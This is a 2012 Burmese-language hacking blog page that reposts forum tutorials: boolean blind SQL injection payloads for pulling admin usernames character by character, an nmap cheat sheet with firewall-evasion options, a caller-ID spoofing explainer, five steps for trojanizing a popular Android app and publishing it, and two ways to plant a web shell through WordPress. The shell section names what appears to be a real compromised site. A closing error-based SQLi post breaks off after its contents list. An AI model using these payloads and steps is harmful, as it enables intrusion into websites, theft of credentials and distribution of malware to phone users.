Showing posts with label tutorial. Show all posts
Showing posts with label tutorial. Show all posts

Thursday, September 13, 2012

Blind Sql Inj3cti0n Yummy Guide

Posted Image


၀ … ပထမဆုံးေျပာခ်င္တာက … Blind ကသိပ္အခ်ိန္ကုန္လုိ. ၀ တုိ. … အေနနဲ. Tool သုံးမယ္ဆုိရင္ဘာမွေ၀ဖန္စရာမရိွပါဘူး…. သုံးခ်င္တာသုံးၾကပါ … ဟဲဟဲ…
ဒါပင္မယ့္လည္း … ဘယ္လုိဘယ္လုိ … လုပ္သလဲဆုိတဲ့နည္းေလးတိထားရင္ေကာ မေကာင္းဘူးလား… ??
ဒါေၾကာင့္ဒီဟာကုိေရးတာပါ…
Blind ကိုဘာလုိ.သံုးရသလဲဆုိေတာ့ … DB ထဲမွာ “information_schema” ဆုိတဲ့ Table ေလးမရိွတာေၾကာင့္ Union ေတြဘာေတြနဲ. Data ကုိထုတ္လုိ.မရဘူး … (version ေအာက္ေနလုိ.ေပါ့)

[+]Blind ၂မ်ိဳးရွိပါတယ္ …
၁.Boolean Based (normal blind)
2.Time Based (time delay)
အဲကလုိေပါ့ …

[1]Boolean
ဥပမာ … ၀တုိ.မွာ … ေဟာဒီ error ျဖစ္ေနတဲ့ ဆုိဒ္ေလးရွိတယ္… ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13

#သူ.ကို single quote ( ‘ ) ေလးနဲ.စမ္းျပီး… ေနာက္ဆုံး version ေအာက္ေနေတာ့ ေရွ.ဆက္လုိ.မရဘူးဆုိပါေတာ့

#တခ်ိဳ.ဆုိဒ္ေတြက … single-quote(‘) နဲ.စမ္းမရဘူး … ဒါဆုိ Boolean Logic (True or False)ကုိသုံးပါမယ္ … Boolean ကေတာ့ အလယ္ရာစုက…သခၤ်ာပညာရွင္ၾကီးပါ … Programmer ကုိကုိေတြ ေကာင္းေကာင္းသိၾကပါတယ္…
အဲဒီေတာ့ ေစာေစာကဆုိက္ရဲ. Variable ေနာက္မွာ
and 1=1
ဆုိျပီးထည့္ကာစမ္းလုိက္ပါမယ္…
www.နတ္ဆုိး.net/index.php?catid=13 and 1=1
webpage ကပုံမွန္ပဲတက္လာတယ္ … no error
ဘာလုိ.ဆုိေတာ့ … တစ္က တစ္နဲ.ညီတယ္ဆုိတာ ကေလးေတာင္တိတယ္…ေလ… ဘာလို.error ျပရမွာလဲဟုတ္စ…
ဒီတစ္ခါ
and 1=2

ဒါဆုိရင္ link က

www.နတ္ဆုိး.net/index.php?catid=13 and 1=2

webpage ကုိသတိထားၾကည့္ပါ…. ပုံတစ္ခ်ိဳ. … စာတစ္ခ်ဳိ.ေျပာက္ေနျပီဆုိိ… error ေပါက္ေနပါျပီ…
1=2 ပဲစမ္းရမယ္လုိ. ပုံေသမရိွပါဘူး… logic အရမွားေနတာေတြၾကိဳက္တာစမ္းလုိ.ရတယ္…. ဥပမာ…
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=0
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=2
အဲလုိမ်ိဳးလဲရေသးတယ္…

#Version
and substring(@@version,1,1)=VERSION
version ဆိုတဲ့ေနရာေလးမွာ 4 တစ္ခါ 5 တစ္ခါထည့္ပါမယ္…
ဒီေတာ့ျဖစ္လာမယ့္ ပုံစံေလးက…

www.နတ္ဆုိး.net/index.php?catid=13 and substring(@@version,1,1)=4
page မွန္မွန္ကန္ကန္တက္တဲ့ဟာက … အဲဒီ့ version ေပါ့ … ဟုတ္ဖူူးလား…

#TableName
 and (SELECT 1 from TABLENAME limit 0,1)=1

table-name ဆုိတဲ့ေနရာမွာ … ကုိယ္ခန္.မွန္းလုိ. ရသေလာက္ tblname ေတြခန္.မွန္းျပီးထည့္ပါ…
ဒီေတာ့ျဖစ္လာမယ့္ပုံစံက…

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from မရွိတဲ့tablename limit 0,1)=1

ဒါဆုိ. … tablename ကတကယ္မရွိတာေၾကာင့္ page က error ေတြနဲ.တက္လာပါတယ္… ဒါဆုိဆက္ျပီးစမ္းပါ …
users ဆုိတဲ့ table တစ္ခုခ်ိတယ္.... ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from users limit 0,1)=1

users ဆုိတဲ့ Table ရွွိတာေၾကာင့္ page ကပုံမွန္တက္လာပါျပီ … notepad မွာ ကုိုယ္သိျပီးတဲ့ tablename ကုိ ခဏမွတ္ထားပါ….

#Columns

and (SELECT substring(concat(1,ColumnName),1,1) from TableName limit 0,1)=1

TableName = ေစာေစာက ကုိယ္သိျပီးတဲ့ tblname
ColumnName = အခုကုိယ္မွန္းထည့္ရမယ့္ colname

ဒါဆုိ ပုံစံက …

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,မရွိတဲ့Columnname),1,1) from users limit 0,1)=1

page ပုံမွန္မတက္ပါ… ဘာလုိ.ဆုိေတာ့ … column name တကယ္ မရွိတာေၾကာင့္ပါ…
admin ဆုိတဲ့ ... column ရွိတယ္ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,admin),1,1) from users limit 0,1)=1

page ပုံမွန္တက္လာျပီ… ဒါဆုိ admin ဆိုတဲ့ column ရိွလုိ.ေပါ့

#Getting Data
အခု data ထုတ္ဖုိ. … ေအာက္က query ကုိသုံးမယ္…
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

COLUMN = ေစာေစာကကုိယ္သိခဲ့တဲ့ admin column
TABLE = ေစာေစာကကုိယ္သိခဲ့တဲ့ table name

www.asciitable.com ကုိေသာ္လည္းေကာင္း … hackbar က text-hex ကုိေသာ္လည္းေကာင္း http://easycalculation.com/ascii-hex.php ကုိေသာ္လည္းေကာင္းသြားပါ

ASCII VALUE HERE= ဆိုတဲ့ေနရာမွာ … data ရဲ. Ascii value ေတြကုိမွန္းထည့္မွာပါ
ပုံမွန္ site ေတြမွာ username ကုိ special Character ေတြ ...ေပးမထည့္ပါ ... ဒါေၾကာင့္ special character တစ္ခုျဖစ္တဲ့ @ နဲ. စျပီးစစ္ပါမယ္
@ ရဲ. Ascii value က 64 ပါ … ဒါေၾကာင့္အခုလုိ …
and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>64

page မွန္မွန္ကန္ကန္မတက္ဘူး… ဒါဆုိ… username က @ နဲ.မစတာေသခ်ာသြားျပီ … 64 ကုိဆက္တိုးျပီးမွန္းၾကည့္ပါတယ္….
ဆုိပါစုိ. Admin name က john လုိ.
J ရဲ. Ascii value က 106
ဒါေၾကာင့္ပုံစံက ….

and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>105

page မွန္မွန္ကန္ကန္တက္လာမယ္ … ဘာလုိ.ဆုိေတာ့ j ဆုိတဲ့ value ကတကယ္ရွိေနလုိ. Ascii value က 105 …
အဲဒီမွာ 106 လုိ.ေျပာင္းထည့္ၾကည့္လိုက္ရင္… error တက္လာမယ္ ဒါဆုိ. … 106ကို table မွာသြားဖတ္ရင္ … j လုိ.ေတြ.ရလိမ့္မယ္…
ခ်ဳံေျပာရရင္ … error မတက္မခ်င္းေရွ.တုိး… error တက္ရင္ရပ္ … ျပီးရင္ table မွာသြားဖတ္ေပါ့ ….

ပထမတစ္ေနရာျဖစ္တဲ့ 1,1 ကျပီးသြားျပီ…
ဒုတိယေနရာျဖစ္တဲ့ 2,1 ကုိေစာေစာကနည္းအတုိင္းစမ္းပါ… “O”ရရင္…
စုစုေပါင္း.. 2 လုံးရပါျပီ… “ j၀ “ ဒီနည္းအတုိင္း…. ဆက္ျပီးစမ္းၾကည့္ပါ…
ေတာ္ေတာ္ကုိ …အခ်ိန္ကုန္တဲ့ method မုိ. … ဦးဦး mhu@larm ေပးထားတဲ့
List of Table & columns ေတြကုိ … copy paste လုပ္ျပီး… Havij လုိ tool မ်ိဳးမွာ … ထပ္ေပါင္းထည့္ေပးလုိက္ရင္တူူတုိ.က …. AUTO လုပ္ေပးမွာေပါ့… ဟုတ္ဖူးလား….

[2]Time delay ကုိေရးခ်င္ေတာ့ဖူး…. ဘာလုိ.ဆုိေတာ့ … ကိုယ္ႏိုင္ငံ connection ကသိတဲ့အတုိင္းပဲ … အဲဒီ့နည္းက … page loading လုပ္မယ့္အခ်ိန္ကုိ … ကန္.သတ္လုိက္ျပီး… error ေပါက္မေပါက္စစ္တာ …
ဒီမွာစစ္ေနရင္ေတာ့ … ၁နာရီၾကာမွ တစ္ခါတက္တဲ့ loading ဆုိေတာ့ …. ဟူး……
G00Gle မွာအမ်ားၾကီးပါ… ရွာၾကည့္ၾကည့္ေပါ့… မေတြ.ရင္လည္းေျပာေပ့ါ ….

ဒီနည္းေတြပဲလားဆုိေတာ့ ... ဟုတ္ပါဖူး... တျခားနည္းေတြလည္းရွိေသးတာေပါ့
Error Based နဲ.လည္း... ထုိးလုိ.ရပါေသးတယ္...

copy from http://mmhackforums.com//index.php?/topic/814-blind-sql-inj3cti0n-yummy-guide/
Read More ->>

Tuesday, September 4, 2012

Nmap Kung-Fu {Basic Scanning technique}


Nmap ဆိုတာနဲ ့ pentest သမားေတြေကာ ဟက္ကာၾကီးေတြေကာ လက္စြဲထားရတာ ၾကားဖူးၾကမယ္ထင္ပါတယ္ ... host / server / system တစ္ခု စေဖာက္ဖို ့ဆို အရင္ဆံုး/ပထမဆံုး step အၿဖစ္ nmap ကအဓိကေနရာက ပါဝင္လုပ္ေဆာင္ပါတယ္ ... window သမားေတြအတြက္လည္းရွိပါတယ္.. ဒါေပမယ့္ window မွာသံုးရတာေတာ့ တမ်ိဳးပဲဗ် က်ေနာ့္အထင္ ... Posted Image

nmap ဆိုတာဘာလဲ >>>
http://nmap.org/
window သမားေတြအတြက္ >>> http://nmap.org/book/inst-windows.html
Nmap Online tool >>> http://nmap-online.com/ // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....

ေအာက္မွာ nmap ရဲ ့ basic scanning techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္ လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္ လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို ့တင္ရက်ိဳး နပ္ပါတယ္ .. Posted Image

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]


./preview

 
credit:http://pentestlab.wordpress.com/
copy from MHU
Read More ->>

Monday, September 3, 2012

Caller ID spoofing



ခုတေလာ cracking ေရာင္ေရာင္ hacking ေရာင္ေရာင္လုပ္ေနတာနဲ့ post ေတာင္မေရးျဖစ္ဘူးျဖစ္ေနတယ္။ ဘာေရးရမွန္းမသိတာလဲ ပါပါတယ္ :D ။ စိတ္ကူးေလးေပါက္တုန္း ဗဟုသုတ ဆိုျပီး Spoofing အေျကာင္းေလးတစ္ခ်က္ ေျပာျကည့္ရေအာင္။ သိတဲ့ အတိုင္းပဲ က်ြန္ေတာ္က mobile hacking အေျကာင္းတာဝန္ယူထားတယ္ဆိုေတာ့ Caller ID spoofing ေရးထားပါတယ္။ What is Spoofing ?? Spoofing ဆိုတာကေတာ့ hackers ေတြရဲ့ technique တစ္မ်ိုးေပါ့။ အခ်က္အလက္တစ္ခုကို သိခ်င္တဲ့ အခါမ်ိုးတို့ ဒါမွမဟုတ္ ကိုယ့္ကို မသိေစခ်င္တဲ့အခါမ်ိုးတို့မွာသံုးပါတယ္။ အဲ့ spoof ရဲ့ အဓိပဿပါယ္ ေလးက အေျကာင္းအရာတစ္စံုတစ္ကိုဟာသ အျမင္နဲ့ တုတာကို ေျပာတာပါ။ What is Caller ID spoofing?? Caller ID spoofing ဆိုတာက ဖုန္းေခါ္ခံရမယ့္လူဘက္က ေပါ္မဲ့ Caller ID ကို လာေနက် station ကမဟုတ္ပဲ တစ္ျခား number အေနနဲ့ေဖာ္ ျပနိုင္တဲ့ telephone network ရဲ့ ျဖစ္ေပါ္လာတဲ့ အေလ့အက်င့္တစ္ခုေပါ့။ ဥပမာ ျမန္မာနိုင္ငံက သူငယ္ခ်င္းတစ္ေယာက္ ကို ကိုယ္က ဒီနုိင္ငံက နံပါတ္မဟုတ္ပဲ တစ္ျခားနံပါတ္ျဖစ္ေအာင္ဖန္တီးျပီး ကိုယ္ဖုန္းနဲ့ ေခါ္တာမ်ိုးေပါ့။တစ္ဖက္လူကို မိမိ အေျကာင္း trace လိုက္လို့ မရေအာင္ လုပ္တဲ့ ပံုစံမ်ိုးျဖစ္ပါတယ္။ email spoofing လိုပဲ ဘယ္က ပို့မွန္းမသိေအာင္ ေနတဲ့ email sender အေန သေဘာမ်ိုးနဲ့ ဆက္သြယ္ျခင္းျဖစ္ပါတယ္။ ဘယ္နံပါတ္မ်ိုးမဆို Caller ID spoofing က caller ေတြ အျကိုက္ဖန္တီးေပးနုိင္ပါတယ္။ Process of Providers ရုိးရွင္းတဲ့ spoofing service တစ္ခုရဲ့ process ကို ေျပာပါ့မယ္ ။ customer တစ္ေယာက္က call spoofing company တစ္ခုမွာ Personal identification number (PIN) တစ္ခုကို ဝယ္လိုက္တယ္ အဲ့ PIN က ခု prepaid ေတြလိုေပါ့ call time အတိအက်ပါတယ္။ ဘယ္နွနာရီေျပာနုိင္မယ္ေပါ့ေလ။ အဲဒါနဲ့ customer က ေပးထားတဲ့ Company က ေပးတဲ့ number ကို dial လုပ္ သူရထားတဲ့ PIN ကို နွိပ္မယ္။ျပီးေတာ့ customer က ေခါ္မယ့္ နံပါတ္ကို နွိပ္မယ္ျပီးရင္ Caller ID ကို ေျပာင္းခ်င္တဲ့ နံပါတ္ေျပာင္းမယ္။ ဒါက User or customer ဘက္က လုပ္တာ။ အဲ့ customer နွိပ္ျပီးတာနဲ့ တျပိုင္နက္ call က ဟို receive လုပ္မယ္လူဆီကို company က လြွဲေပးလိုက္ျပီ။ အဲ့မွာ တင္ receive လုပ္တဲ့့လူဘက္မွာ ဘယ္က မွန္းမသိေသာ Caller ID ေပါ္လာျပီေပါ့။ Web-based spoofing service ေတြက provider ေတြနဲ့ အေကာင့္ေတြလုပ္။ customer ေတြကို သူတို့ website မွာ login ဝင္ျပီးရင္ form ကို ျပည့္စံုေအာင္ျဖည့္။အမ်ားစု company ေတြ ေတာင္းတဲ့ အခ်က္ေတြက ၁.source number ၂.destination number ၃.caller ID number ေတြပါပဲ။ ဥပမာအေနနဲ့ http://www.teleturd.com/ မွာသြားျကည့္လို့ရပါတယ္။တစ္ခ်ို့ company ေတြဆို အသံေျပာင္းလို့ရေအာင္ေတာင္ ထည့္ေပးပါေသးတယ္။ Caller ID spoofing ေတြကို ဘယ္လိုင္းေတြမွာ သံုးတာမ်ားလဲဆိုရင္ Voice Over Internet Protocol( VoIP)နဲ့ Primary Rate Interface(PRI)တို့မွာသံုးတာမ်ားပါတယ္။ ေနာက္ထပ္ spoofing method ေတြရွိပါေသးတယ္။ orange boxing တို့ဘာတို့ ေပါ့။ဟိုတစ္ေခါက္က က်ြန္ေတာ္ red boxing ေရးခဲ့ဖူးတယ္မလား။ ခု orange boxing ကသူ့အဆက္ :D ။ က်ြန္ေတာ္ တစ္ေခါက္ေရးေပးခဲ့တယ့္ spoofapp ဆိုတဲ့ android apk က လဲ caller id spoofing ပါပဲ။အဲ့ app ကေတာ့ US နဲ့ Canada မွာ ပဲ ရတယ္လို့ေျပာပါတယ္။ ခုေနာက္ပိုင္း spoofing နဲ့ပတ္သတ္တဲ့ apk ေတြအမ်ားျကီးထြက္လာပါေသးတယ္။ေနာက္ဆံုး က်ြန္ေတာ္သူငယ္ခ်င္းေပးတဲ့ msg spoof apk ကေတာ့ txtmyanmar.apk ပါ။အခါသင့္ အခြင့္သာရင္ orange boxing အေျကာင္းထပ္ေရးပါမယ္လို့ ကတိေပးရင္း ဒီေလာက္နဲ့ေက်နပ္မယ္လို့ထင္ပါတယ္ :D ။ စာဖတ္ပရိတ္သတ္အေပါင္း ကိုယ္ေရာစိတ္ပါက်န္းမာခ်မ္းသာပါေစ။ ဒါက ဗဟုသုတ အေနနဲ့ ေရးတာ ပါ ။ဒီနည္းေတြက Social engineering ေကာင္းရင္ ေကာင္းသေလာက္ အသံုးဝင္ပါတယ္။ထို့ေျကာင့္ ေနာက္တစ္ခုဆုေတာင္းတာက လူအခ်င္းခ်င္း လွည့္ပတ္ျခင္း ကင္းရွင္းျကပါေစလို့ :)

copy from ghostarea.net
Read More ->>

Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို :D )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ :D
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

..:: How to upload shell via Wordpress ::..[2 methods]



Wordpress ထဲကို ကိုယ္ရထားတဲ႔ username / password နဲ႔ login ၀င္ပါ...Dashboard ကိုေရာက္ပါလိမ္႔မယ္...ဘယ္ဘက္နားက appearance ကိုႏွိပ္ပါ...editor ကိုဆက္ႏွိပ္ပါ...Select theme to edit ဆိုျပီး ဒီလိုမ်ိဳးေလးျမင္ရပါလိမ္႔မယ္...ၾကိဳက္ႏွစ္သက္ရာ theme ကုိထားလိုက္ပါ...ကၽြန္ေတာ္ကေတာ႔ url ေခၚရ လြယ္ကူရွင္းလင္းေအာင္ twentyten ကိုပဲထားလိုက္ပါတယ္...select ကို ႏွိပ္ပါ...ပံုေတာ႔နည္းနည္းေသးတယ္....သည္းခံၾကည္႔ဗ်ာ....


 ျပီးရင္ ညာဘက္ျခမ္းနားက 404.php / sidebar.php / page.php စသည္ျဖင္႔ php ေတြအမ်ားၾကီး ရွိပါတယ္...ၾကိဳက္ႏွစ္သက္ရာ php တစ္ခုကို click လိုက္ပါ...edit box ထဲမွာ က်လာတဲ႔ သူ႔ရဲ႔ source code ကို shell ရဲ႔ source code နဲ႔လဲျပီး update ကို ႏွိပ္လိုက္ပါ...wordpress ကို shell တင္ျခင္း လုပ္ငန္းျပီးဆံုးပါျပီ....

shell url ကိုေခၚပါမယ္...သူ႔ path က ဒီလိုပါ...

www.site.com/wp-content/themes/themename/shellname.php


ကဲ...shell ၀င္သြားပါျပီဗ်ာ...ဒါပါပဲ...ေနာက္နည္းေတြလည္း ရွိေသးတယ္ဗ်...ဒါေပမယ္႔ ဒါကေတာ႔ အေသခ်ာဆံုးနည္းပဲ...


ေနာက္တစ္နည္း....
ဒီနည္းကို တို႔အစ္ကိုၾကီးတုတ္ေကာက္ ျပထားတာပါ...

http://www.site.com/...eme-install.php ဆိုတဲ႔အဲ path ကိုသြားပါ... upload option ေတြ႔ပါလိမ္႔မယ္...ႏွိပ္ျပီးေတာ႔ ေတြ႔တဲ႔ browse ကေန shell တင္ပါမယ္....






ဒီမွာ မွတ္ထားရမွာက shell ကိုဒီအတိုင္း .php အေနနဲ႔ တင္လို႔မရပါဘူး.... .zip နဲ႔တင္မွရပါမယ္...ဒီေတာ႔ ကိုယ္တို႔ shell က ccc.php ဆိုပါစို႔...... .zip နဲ႔ ခ်ံဳ႔လိုက္ပါမယ္..... ccc.zip ေပါ႔.... အဲဒီ ccc.zip ကို upload လုပ္ပါ.... .rar မဟုတ္ဘူးေနာ္... zip ... ေသခ်ာေျပာတယ္ေနာ္... .zip လို႔....

တင္လိုက္တာရသြားရင္ ဒီလိုမ်ိဳးစာျပပါလိမ္႔မယ္....


Unpacking the package
Installing the theme
Theme installed successfully.

ဒါဆို shell ရသြားပါျပီ... 
မ်ားမ်ားမေျပာဘူး....သူ႔ shell path က ဒီလိုမ်ိဳးေလးျဖစ္ပါမယ္...မေမ႔ခ်င္ရင္ က်က္ထား... 

www.site.com/wp-content/themes/ccc/ccc.php

ကၽြန္ေတာ္က 404.zip ကိုတင္လိုက္တယ္....ဒီေတာ႔ ကၽြန္ေတာ္႔ shell path က ဒီလိုျဖစ္သြားတာေပါ႔ဗ်ာ.... 
http://www.divinginsurance.org/wp-content/themes/404/404.php



copy from MHU
Read More ->>

[Tut]Error-Based SQL Injection[/Tut]



Error-Based SQL Injection

Content
1.Introduction
2.About
3.Version စစ္မယ္
4.Database စစ္မယ္
